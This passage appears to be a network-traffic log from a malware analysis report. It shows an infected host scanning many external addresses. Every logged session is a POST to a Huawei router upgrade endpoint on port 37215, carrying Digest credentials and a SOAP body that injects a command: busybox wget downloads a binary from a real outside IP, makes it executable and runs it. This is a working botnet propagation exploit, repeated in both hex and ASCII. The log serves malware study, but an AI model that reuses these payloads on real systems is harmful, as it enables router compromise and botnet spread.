                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1101192.168.2.1545602186.128.167.9037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929995060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1102192.168.2.1545204157.207.239.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930016994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1103192.168.2.155209631.56.35.25337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930017948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1104192.168.2.1545350197.224.248.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930049896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1105192.168.2.1543708122.250.72.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930058956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1106192.168.2.156037841.229.88.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930078983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1107192.168.2.1549382181.249.241.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930110931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1108192.168.2.1542174102.230.68.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930114031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1109192.168.2.155957245.60.160.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930143118 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1110192.168.2.1557562181.158.245.3337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930145979 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
